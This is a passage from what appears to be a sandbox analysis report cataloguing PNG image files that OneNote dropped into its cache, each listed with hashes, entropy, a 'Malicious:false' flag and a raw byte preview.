                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
